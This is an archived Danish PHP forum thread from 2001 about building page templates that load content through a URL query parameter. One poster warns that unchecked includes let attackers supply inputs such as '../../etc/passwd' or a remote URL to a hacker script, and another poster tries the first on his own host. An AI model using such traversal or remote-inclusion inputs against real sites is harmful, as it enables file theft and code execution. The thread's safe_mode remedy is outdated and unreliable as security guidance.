/ Forside / Teknologi / Udvikling / PHP / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
PHP
#NavnPoint
rfh 3959
natmaden 3372
poul_from 3310
funbreak 2700
stone47 2230
Jin2k 1960
Angband 1743
Bjerner 1249
refi 1185
10  Interkril.. 1146
side.php?minside.html
Fra : Andreas N Rasmussen


Dato : 19-08-01 13:50

Man ser mange steder at skabalonen laves i php (se subj.) og så kalder
indholdet ind vha. et ?. F.eks. stopcopydan.dk bruger den metode.

Hvordan gør man det ?

På forhånd tak

MVH ANR

"They say the greatest tragedy is when a father outlives his son.
I've never fully understood why that is. Frankly, I can see an up
side to it."
-Abraham "Grampa" Simpson

 
 
Niels Andersen (19-08-2001)
Kommentar
Fra : Niels Andersen


Dato : 19-08-01 15:24

"Andreas N Rasmussen" <anrNOTPART@OFMAILmac.com> wrote in message
news:1eye5uc.148w6x18dis00N%anrNOTPART@OFMAILmac.com...
> Man ser mange steder at skabalonen laves i php (se subj.) og så kalder
> indholdet ind vha. et ?. F.eks. stopcopydan.dk bruger den metode.
> Hvordan gør man det ?

stopcopydan gør fx. sådan her:
http://www.stopcopydan.dk/index.php?valg=forside

index.php spytter først en header ud.
Så viser den forsiden (fordi valg=forside), og til sidst sender den
footeren.

Andet er der såmen ikke i det.

Det kan så være at den kigger efter fx. "forside.inc.php" og includer den
hvis den findes, eller måske henter den noget fra en database, fx "SELECT
page FROM pages WHERE id='forside'".

--
Mvh.

Niels Andersen



Andreas N Rasmussen (19-08-2001)
Kommentar
Fra : Andreas N Rasmussen


Dato : 19-08-01 17:25

Niels Andersen <niels-usenet@myplace.dk> wrote:

> stopcopydan gør fx. sådan her:
> http://www.stopcopydan.dk/index.php?valg=forside
>
> index.php spytter først en header ud.
> Så viser den forsiden (fordi valg=forside), og til sidst sender den
> footeren.
>
> Andet er der såmen ikke i det.

Okay. Jeg forstår godt hvad den gør når den har fundet ud af hvad valget
er, men hvor i php 'får man fat' valget. Hvordan ser man hvad valget er?

MVH ANR

"Ohh! A trillion-dollar bill! That's a spicy meatball!"
-Homer Simpson

Hauge (19-08-2001)
Kommentar
Fra : Hauge


Dato : 19-08-01 17:49

Hejsa

"Andreas N Rasmussen" <anrNOTPART@OFMAILmac.com> wrote in message
news:1eyegb0.87uz6apoehbkN%anrNOTPART@OFMAILmac.com...
> > http://www.stopcopydan.dk/index.php?valg=forside
> Okay. Jeg forstår godt hvad den gør når den har fundet ud af hvad valget
> er, men hvor i php 'får man fat' valget. Hvordan ser man hvad valget er?

Hvis jeg forstår dit spørgsmål, så vil der blive sat en variabel i index.php
med navnet $valg med værdien "forside", i følge ovenstående link.

Mvh Hauge



Niels Andersen (19-08-2001)
Kommentar
Fra : Niels Andersen


Dato : 19-08-01 17:54

"Andreas N Rasmussen" <anrNOTPART@OFMAILmac.com> wrote in message
news:1eyegb0.87uz6apoehbkN%anrNOTPART@OFMAILmac.com...
> > http://www.stopcopydan.dk/index.php?valg=forside

> Okay. Jeg forstår godt hvad den gør når den har fundet ud af hvad valget
> er, men hvor i php 'får man fat' valget. Hvordan ser man hvad valget er?

Med standard konfiguration vil variablen $valg på ovenstående url have
indholdet 'forside'.
Ellers vil den altid stå i $HTTP_GET_VARS['valg'].

Hvis der nu bare stod "index.php?forside" kan man benytte $QUERY_STRING
eller $HTTP_SERVER_VARS['QUERY_STRING'].

--
Mvh.

Niels Andersen



Andreas N Rasmussen (19-08-2001)
Kommentar
Fra : Andreas N Rasmussen


Dato : 19-08-01 18:44

Niels Andersen <niels-usenet@myplace.dk> wrote:

> > Okay. Jeg forstår godt hvad den gør når den har fundet ud af hvad valget
> > er, men hvor i php 'får man fat' valget. Hvordan ser man hvad valget er?
>
> Med standard konfiguration vil variablen $valg på ovenstående url have
> indholdet 'forside'.
> Ellers vil den altid stå i $HTTP_GET_VARS['valg'].
>
> Hvis der nu bare stod "index.php?forside" kan man benytte $QUERY_STRING
> eller $HTTP_SERVER_VARS['QUERY_STRING'].

Perfekt - det var lige det jeg ville vide. Tak.

MVH ANR

"Romance is dead. It was acquired in a hostile takeover by Hallmark and
Disney, homogenized, then sold off piece by piece."
-Lisa Simpson

Dennis (20-08-2001)
Kommentar
Fra : Dennis


Dato : 20-08-01 09:47

> Man ser mange steder at skabalonen laves i php (se subj.) og så kalder
> indholdet ind vha. et ?. F.eks. stopcopydan.dk bruger den metode.

Husk lige på (kan se at du allerede har fået svar på dit spørgsmål), at du
nok skal tænke over ikke bare ukritisk at include filnavnet som står i query
Det kan give sjove resultater, hvis man f.eks. i query skriver
"side.php?../../etc/passwd" eller ligende. Hehee... har set eksempler på
dette og har endda også selv gjort det en gang (uuups) - altså haft den
fejl.

--
Mvh.
Dennis



Andreas Haugstrup - ~ (20-08-2001)
Kommentar
Fra : Andreas Haugstrup - ~


Dato : 20-08-01 12:07

Dennis skrev i meddelelsen <784g7.34$Zm6.2846@news.get2net.dk>...
> Det kan give sjove resultater, hvis man f.eks. i query skriver
>"side.php?../../etc/passwd" eller ligende. Hehee... har set eksempler på
>dette og har endda også selv gjort det en gang (uuups) - altså haft den
>fejl.

Jeg har set den der med ../../etc/passwd flere gange nu og jeg er lidt
nysgerrig. Hvad kan man med de info der eventuelt hentes frem?

Andreas (der indtil nu har undgået at lave den fejl)
----
http://solitude.dk



Dennis (20-08-2001)
Kommentar
Fra : Dennis


Dato : 20-08-01 12:21

> > Det kan give sjove resultater, hvis man f.eks. i query skriver
> >"side.php?../../etc/passwd" eller ligende. Hehee... har set eksempler på
> >dette og har endda også selv gjort det en gang (uuups) - altså haft den
> >fejl.

> Jeg har set den der med ../../etc/passwd flere gange nu og jeg er lidt
> nysgerrig. Hvad kan man med de info der eventuelt hentes frem?
> Andreas (der indtil nu har undgået at lave den fejl)

Med den "forkerte" opsætning (dvs. safe_mode=off), så vil man kunne få
adgang til alle filer på din maskine. Endvidere vil man kunne ekserkvere
kode osv. osv. (f.eks. hvis man istedet for en fil, skriver
"side.php?http://minside.dk/hackercode.php") så ehh.. man kan faktisk lave
en del

--
Mvh.
Dennis



Andreas Haugstrup - ~ (20-08-2001)
Kommentar
Fra : Andreas Haugstrup - ~


Dato : 20-08-01 12:44


Dennis skrev i meddelelsen ...
>Med den "forkerte" opsætning (dvs. safe_mode=off), så vil man kunne få
>adgang til alle filer på din maskine. Endvidere vil man kunne ekserkvere
>kode osv. osv. (f.eks. hvis man istedet for en fil, skriver
>"side.php?http://minside.dk/hackercode.php") så ehh.. man kan faktisk lave
>en del

Jeg prøvede sådan lige for sjov at include /etc/passwd på mit webhotel, men
det blev jeg ikke meget klogere af. Den spytter godt nok en liste over
brugere ud, så der gik da lidt tid med at være nysgerrig.

Jeg kan godt se hvor problemet ligger, men vil de fleste filer ikke være
beskyttet fordi de ikke er chmod'et til 755 (eller noget lign.) ?

Andreas
----
http://solitude.dk



Dennis (20-08-2001)
Kommentar
Fra : Dennis


Dato : 20-08-01 13:19

> >Med den "forkerte" opsætning (dvs. safe_mode=off), så vil man kunne få
> >adgang til alle filer på din maskine. Endvidere vil man kunne ekserkvere
> >kode osv. osv. (f.eks. hvis man istedet for en fil, skriver
> >"side.php?http://minside.dk/hackercode.php") så ehh.. man kan faktisk
lave
> >en del

> Jeg prøvede sådan lige for sjov at include /etc/passwd på mit webhotel,
men
> det blev jeg ikke meget klogere af. Den spytter godt nok en liste over
> brugere ud, så der gik da lidt tid med at være nysgerrig.
> Jeg kan godt se hvor problemet ligger, men vil de fleste filer ikke være
> beskyttet fordi de ikke er chmod'et til 755 (eller noget lign.) ?

Jo, det kræver at filen kan læses af alle eller "nobody" (eller rettere..
den bruger som Apache/WEB-server køre som).

--
Mvh.
Dennis



Thomas Albech (21-08-2001)
Kommentar
Fra : Thomas Albech


Dato : 21-08-01 20:47

Hvordan og hvor slår man safe_mode fra??
Har nemlig lavet fejlen

/Thomas

"Dennis" <net90@mail.mira.dk> wrote in message
news:no6g7.80$Zm6.3902@news.get2net.dk...
> > > Det kan give sjove resultater, hvis man f.eks. i query skriver
> > >"side.php?../../etc/passwd" eller ligende. Hehee... har set eksempler

> > >dette og har endda også selv gjort det en gang (uuups) - altså haft den
> > >fejl.
>
> > Jeg har set den der med ../../etc/passwd flere gange nu og jeg er lidt
> > nysgerrig. Hvad kan man med de info der eventuelt hentes frem?
> > Andreas (der indtil nu har undgået at lave den fejl)
>
> Med den "forkerte" opsætning (dvs. safe_mode=off), så vil man kunne få
> adgang til alle filer på din maskine. Endvidere vil man kunne ekserkvere
> kode osv. osv. (f.eks. hvis man istedet for en fil, skriver
> "side.php?http://minside.dk/hackercode.php") så ehh.. man kan faktisk lave
> en del
>
> --
> Mvh.
> Dennis
>
>



Dennis (22-08-2001)
Kommentar
Fra : Dennis


Dato : 22-08-01 09:15

> Hvordan og hvor slår man safe_mode fra??
> Har nemlig lavet fejlen

> > Med den "forkerte" opsætning (dvs. safe_mode=off), så vil man kunne få
> > adgang til alle filer på din maskine. Endvidere vil man kunne ekserkvere
> > kode osv. osv. (f.eks. hvis man istedet for en fil, skriver
> > "side.php?http://minside.dk/hackercode.php") så ehh.. man kan faktisk
lave
> > en del


I filen php.ini. Søg på safe_mode.

--
Mvh.
Dennis




Søg
Reklame
Statistik
Spørgsmål : 177560
Tips : 31968
Nyheder : 719565
Indlæg : 6408942
Brugere : 218888

Månedens bedste
Årets bedste
Sidste års bedste